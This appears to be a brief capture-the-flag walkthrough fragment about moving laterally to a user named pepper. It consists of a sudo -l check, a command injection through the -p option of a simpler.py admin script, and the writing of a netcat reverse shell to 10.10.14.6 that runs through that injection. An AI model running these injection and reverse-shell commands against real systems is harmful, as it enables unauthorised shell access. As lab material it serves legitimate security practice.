Pepper
sudo -l




POC
sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
$(whoami)

echo '#!/bin/bash' > rev
echo 'nc 10.10.14.6 1338 -c /bin/bash' >> rev
sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
#(/tmp/rev)


Last updated
Was this helpful?